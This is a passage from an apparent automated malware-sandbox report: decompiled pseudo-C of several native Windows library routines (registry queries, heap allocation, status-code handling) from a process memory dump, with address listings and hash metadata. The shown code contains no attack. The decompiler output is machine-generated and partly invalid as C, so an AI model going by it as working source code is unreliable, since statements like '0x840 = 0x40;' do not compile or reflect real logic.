				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x49fd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04930548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0494B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0491B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x49f7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04927D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04927D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04987016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04949830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E049869A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x49f7c04 != 0) {
						_t118 = _v12;
						_t120 = E0498A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x49f7bd8;
						if( *0x49f7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E049495D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E049499A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04983540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0490B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0494AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x49f8474 - 3;
										if( *0x49f8474 != 3) {
											 *0x49f79dc =  *0x49f79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04927D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04927D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04987016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x49f8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x49f7b00; // 0x0
							asm("ror esi, cl");
							 *0x49fb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E049495D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04917F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                      0x049303f1
                                                      0x049303f7
                                                      0x049303f9
                                                      0x049303fb
                                                      0x049303fd
                                                      0x04930400
                                                      0x0493040a
                                                      0x04974c7a
                                                      0x04930537
                                                      0x04930547
                                                      0x04930410
                                                      0x04930410
                                                      0x04930414
                                                      0x04930417
                                                      0x0493041a
                                                      0x04930421
                                                      0x04930424
                                                      0x0493042b
                                                      0x0493043b
                                                      0x0493043e
                                                      0x0493043f
                                                      0x0493043f
                                                      0x04930446
                                                      0x04930449
                                                      0x0493044c
                                                      0x0493044f
                                                      0x04930459
                                                      0x04974c8d
                                                      0x0493045f
                                                      0x0493045f
                                                      0x0493045f
                                                      0x04930467
                                                      0x04974c97
                                                      0x04974c9d
                                                      0x04974ca4
                                                      0x04974caa
                                                      0x04974caf
                                                      0x04974cb1
                                                      0x04974cc3
                                                      0x04974cb3
                                                      0x04974cbc
                                                      0x04974cbc
                                                      0x04974cc8
                                                      0x04974ccb
                                                      0x04974cd7
                                                      0x04974cda
                                                      0x04974cdf
                                                      0x04974cdf
                                                      0x04974ccb
                                                      0x04974ca4
                                                      0x0493046d
                                                      0x0493046f
                                                      0x0493046f
                                                      0x04930471
                                                      0x04930476
                                                      0x0493047a
                                                      0x0493047b
                                                      0x04930483
                                                      0x04930489
                                                      0x0493048d
                                                      0x00000000
                                                      0x00000000
                                                      0x04974ce9
                                                      0x04974cef
                                                      0x04974d22
                                                      0x04974d22
                                                      0x00000000
                                                      0x04974d22
                                                      0x04974cf1
                                                      0x04974cf7
                                                      0x00000000
                                                      0x00000000
                                                      0x04974cf9
                                                      0x04974cff
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d05
                                                      0x04974d07
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d0d
                                                      0x04974d0f
                                                      0x04974d14
                                                      0x04974d16
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d1c
                                                      0x04974d1c
                                                      0x04930499
                                                      0x04930535
                                                      0x04930535
                                                      0x00000000
                                                      0x04930535
                                                      0x049304a6
                                                      0x04974d2c
                                                      0x04974d37
                                                      0x04974d39
                                                      0x04974d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d41
                                                      0x04974d48
                                                      0x04930527
                                                      0x0493052b
                                                      0x0493052d
                                                      0x04930530
                                                      0x04930530
                                                      0x00000000
                                                      0x0493052b
                                                      0x04974d4e
                                                      0x049304ac
                                                      0x049304ac
                                                      0x049304af
                                                      0x049304b2
                                                      0x049304b7
                                                      0x049304b9
                                                      0x049304bb
                                                      0x049304bd
                                                      0x049304bf
                                                      0x049304c5
                                                      0x049304c9
                                                      0x04974d53
                                                      0x04974d59
                                                      0x04974db9
                                                      0x04974dba
                                                      0x04974dbf
                                                      0x04974dc2
                                                      0x04974dc4
                                                      0x04974dc7
                                                      0x04974dce
                                                      0x00000000
                                                      0x04974dce
                                                      0x04974d5b
                                                      0x04974d61
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d63
                                                      0x04974d69
                                                      0x00000000
                                                      0x00000000
                                                      0x04974d6b
                                                      0x04974d6e
                                                      0x04974d74
                                                      0x04974d76
                                                      0x04974d7c
                                                      0x04974d7e
                                                      0x04974d84
                                                      0x04974d89
                                                      0x04974d8c
                                                      0x04974d8d
                                                      0x04974d92
                                                      0x04974d95
                                                      0x04974d96
                                                      0x04974d98
                                                      0x04974d9a
                                                      0x04974d9f
                                                      0x04974da4
                                                      0x04974da6
                                                      0x04974da8
                                                      0x04974daf
                                                      0x04974db1
                                                      0x04974db1
                                                      0x04974daf
                                                      0x04974da6
                                                      0x04974d84
                                                      0x04974d7c
                                                      0x00000000
                                                      0x04974d74
                                                      0x049304d6
                                                      0x04974de1
                                                      0x049304dc
                                                      0x049304dc
                                                      0x049304dc
                                                      0x049304e4
                                                      0x04974deb
                                                      0x04974df1
                                                      0x04974df8
                                                      0x04974dfe
                                                      0x04974e03
                                                      0x04974e05
                                                      0x04974e17
                                                      0x04974e07
                                                      0x04974e10
                                                      0x04974e10
                                                      0x04974e1c
                                                      0x04974e1f
                                                      0x04974e35
                                                      0x04974e35
                                                      0x04974e1f
                                                      0x04974df8
                                                      0x049304f1
                                                      0x049304fa
                                                      0x04974e3f
                                                      0x04974e47
                                                      0x04974e5b
                                                      0x04974e61
                                                      0x04974e67
                                                      0x04974e69
                                                      0x04974e71
                                                      0x04974e73
                                                      0x04930500
                                                      0x04930500
                                                      0x04930500
                                                      0x049304fa
                                                      0x04930508
                                                      0x0493051d
                                                      0x0493051d
                                                      0x0493051f
                                                      0x04930524
                                                      0x00000000
                                                      0x04930524
                                                      0x04930515
                                                      0x04930517
                                                      0x04974e7a
                                                      0x04974e7c
                                                      0x00000000
                                                      0x00000000
                                                      0x04974e85
                                                      0x00000000
                                                      0x04974e85
                                                      0x00000000
                                                      0x04930517

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50a1c9f38d1ff4a4e396ebad8ab164195a6acc4973c78b03804968ca59f1e988
                                                      • Instruction ID: 72a6efe33431301b8206c771573312176732b3fd66a1c12bd6451fd7973cd987
                                                      • Opcode Fuzzy Hash: 50a1c9f38d1ff4a4e396ebad8ab164195a6acc4973c78b03804968ca59f1e988
                                                      • Instruction Fuzzy Hash: 09913E31F00218AFEB319F69C848BAD7BA9EF42725F054275E950AB2D6E774BD40C781
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490C600, Relevance: .2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0490C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x49fd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04916D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0494B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x49f7b9c; // 0x0
					_t74 = L04924620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04949650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L049277F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0494F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E049413C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L049277F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04949650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                      0x0490c608
                                                      0x0490c615
                                                      0x0490c625
                                                      0x0490c62d
                                                      0x0490c635
                                                      0x0490c640
                                                      0x0490c680
                                                      0x0490c687
                                                      0x0490c688
                                                      0x0490c689
                                                      0x0490c694
                                                      0x0490c694
                                                      0x0490c642
                                                      0x0490c64a
                                                      0x0490c697
                                                      0x04977a25
                                                      0x04977a2b
                                                      0x04977a2e
                                                      0x04977a30
                                                      0x04977bea
                                                      0x04977bea
                                                      0x00000000
                                                      0x04977bea
                                                      0x04977a36
                                                      0x04977a43
                                                      0x04977a48
                                                      0x04977a4c
                                                      0x04977a4e
                                                      0x00000000
                                                      0x00000000
                                                      0x04977a58
                                                      0x04977a5a
                                                      0x04977a5b
                                                      0x04977a5c
                                                      0x04977a5d
                                                      0x04977a63
                                                      0x04977a64
                                                      0x04977a6a
                                                      0x04977a6c
                                                      0x04977a6e
                                                      0x049779cb
                                                      0x049779cb
                                                      0x049779ce
                                                      0x049779d0
                                                      0x04977a98
                                                      0x04977a9b
                                                      0x04977a9b
                                                      0x04977a9e
                                                      0x04977aa1
                                                      0x04977bbe
                                                      0x04977bbe
                                                      0x04977bc0
                                                      0x04977be0
                                                      0x04977be0
                                                      0x04977a01
                                                      0x04977a01
                                                      0x04977a05
                                                      0x04977a07
                                                      0x04977a15
                                                      0x04977a15
                                                      0x04977a1a
                                                      0x00000000
                                                      0x04977a1a
                                                      0x04977bc2
                                                      0x04977bc6
                                                      0x04977bc9
                                                      0x04977bcd
                                                      0x04977bcf
                                                      0x049779e6
                                                      0x049779e6
                                                      0x049779eb
                                                      0x049779eb
                                                      0x049779ef
                                                      0x049779f1
                                                      0x00000000
                                                      0x00000000
                                                      0x049779f3
                                                      0x049779f5
                                                      0x049779ff
                                                      0x049779ff
                                                      0x00000000
                                                      0x049779ff
                                                      0x049779f7
                                                      0x049779fd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049779fd
                                                      0x04977bd5
                                                      0x04977bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x04977ba9
                                                      0x04977bac
                                                      0x04977bb0
                                                      0x04977bb1
                                                      0x04977bb1
                                                      0x04977bb6
                                                      0x00000000
                                                      0x04977bb6
                                                      0x04977aa7
                                                      0x04977aaa
                                                      0x00000000
                                                      0x00000000
                                                      0x04977ab2
                                                      0x04977ab3
                                                      0x04977ab5
                                                      0x04977aec
                                                      0x04977aef
                                                      0x04977b25
                                                      0x04977b28
                                                      0x04977b62
                                                      0x04977b64
                                                      0x04977b8f
                                                      0x04977b92
                                                      0x04977b96
                                                      0x04977b98
                                                      0x00000000
                                                      0x00000000
                                                      0x04977b9e
                                                      0x04977b9f
                                                      0x04977ba3
                                                      0x00000000
                                                      0x04977ba3
                                                      0x04977b66
                                                      0x04977b68
                                                      0x04977ae2
                                                      0x04977ae2
                                                      0x00000000
                                                      0x04977ae2
                                                      0x04977b6e
                                                      0x04977b72
                                                      0x04977b75
                                                      0x04977b81
                                                      0x04977b85
                                                      0x04977b87
                                                      0x00000000
                                                      0x00000000
                                                      0x04977b31
                                                      0x04977b34
                                                      0x04977b3c
                                                      0x04977b45
                                                      0x04977b46
                                                      0x04977b4f
                                                      0x04977b51
                                                      0x04977b57
                                                      0x04977b59
                                                      0x04977b59
                                                      0x00000000
                                                      0x04977b59
                                                      0x04977b77
                                                      0x00000000
                                                      0x04977b77
                                                      0x04977b2a
                                                      0x00000000
                                                      0x04977b2a
                                                      0x04977af1
                                                      0x04977af3
                                                      0x00000000
                                                      0x00000000
                                                      0x04977afb
                                                      0x04977afc
                                                      0x04977afe
                                                      0x00000000
                                                      0x00000000
                                                      0x04977b00
                                                      0x04977b03
                                                      0x00000000
                                                      0x00000000
                                                      0x04977b05
                                                      0x04977b09
                                                      0x04977b0d
                                                      0x04977b0f
                                                      0x00000000
                                                      0x00000000
                                                      0x04977b18
                                                      0x04977b1d
                                                      0x00000000
                                                      0x04977b1d
                                                      0x04977ab7
                                                      0x04977ab9
                                                      0x00000000
                                                      0x00000000
                                                      0x04977abf
                                                      0x04977ac1
                                                      0x00000000
                                                      0x00000000
                                                      0x04977ac3
                                                      0x04977ac6
                                                      0x00000000
                                                      0x00000000
                                                      0x04977ac8
                                                      0x04977acc
                                                      0x04977ad0
                                                      0x04977ad2
                                                      0x00000000
                                                      0x00000000
                                                      0x04977adb
                                                      0x00000000
                                                      0x04977adb
                                                      0x049779d6
                                                      0x049779d9
                                                      0x049779dc
                                                      0x04977a91
                                                      0x04977a94
                                                      0x00000000
                                                      0x04977a94
                                                      0x049779e2
                                                      0x00000000
                                                      0x049779e2
                                                      0x04977a74
                                                      0x04977a7a
                                                      0x00000000
                                                      0x00000000
                                                      0x04977a8a
                                                      0x04977a21
                                                      0x04977a21
                                                      0x00000000
                                                      0x04977a21
                                                      0x0490c650
                                                      0x0490c651
                                                      0x0490c656
                                                      0x0490c65c
                                                      0x0490c65d
                                                      0x0490c663
                                                      0x0490c664
                                                      0x0490c66a
                                                      0x0490c66e
                                                      0x049779c5
                                                      0x049779c7
                                                      0x00000000
                                                      0x049779c7
                                                      0x0490c67a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 68afb4e93b900bb8e63b5cee807602d5920bab285e4379a0719929c111a2dfe5
                                                      • Instruction ID: 87e1e89af70b3c0b858b1f647c6d85557a08df423a2b58c176410f355015f103
                                                      • Opcode Fuzzy Hash: 68afb4e93b900bb8e63b5cee807602d5920bab285e4379a0719929c111a2dfe5
                                                      • Instruction Fuzzy Hash: 3B8180767042029FDB29CE94C881A7B73E9EB84754F1449BEED459B241E330FD45CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0499B8D0, Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 39%
                                                      			E0499B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x49f7b9c; // 0x0
				_t124 = L04924620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04949800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E049495B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E049495D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L049277F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04949910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E049495D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x49f7b9c; // 0x0
									_t92 = L04924620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04949910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0490A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0499E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0499E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E049495B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                      0x0499b8d9
                                                      0x0499b8e4
                                                      0x00000000
                                                      0x0499b8e6
                                                      0x0499b8f3
                                                      0x0499b8f5
                                                      0x0499b8f5
                                                      0x0499b8f8
                                                      0x0499b920
                                                      0x0499b924
                                                      0x0499b936
                                                      0x0499b939
                                                      0x0499b93d
                                                      0x0499b948
                                                      0x0499b9a0
                                                      0x0499b9a0
                                                      0x0499b9a4
                                                      0x0499b9bf
                                                      0x0499b9c4
